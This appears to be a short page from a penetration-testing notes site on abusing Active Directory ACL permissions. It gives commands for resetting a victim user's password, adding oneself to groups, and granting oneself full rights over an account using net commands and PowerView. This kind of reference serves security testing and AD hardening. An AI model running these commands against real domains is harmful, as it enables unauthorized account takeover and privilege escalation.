ACLs/ACEs

- GenericAll and AllExtendedRights

Once located an user on which we have GenericAll or AllExtendedRights access rights with PowerView, we can change it's password:

net user vulnuser Password123! /domain

Once located a group on which we have GenericAll access rights with PowerView, we can add ourselfs to it:

net group testgroup user /add /domain

- WriteDACL

Once located an user on which we have WriteDACL access rights with PowerView, we can add the GenericAll access right to it:

Add-DomainObjectAcl -TargetIdentity vulnuser -PrincipalIdentity {our user} -Rights All

- User-Force-Change-Password

Once located an user or group that has User-Force-Change-Password rights over another user with PowerView, we must load PowerView within a session of the user who has rights or ir part of the group that has those rigths and execute the following command:

Set-DomainUserPassword -Identity Vulnuser -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force) -Verbose

PreviousCertificate Services (AD CS)NextGroup Policy

Last updated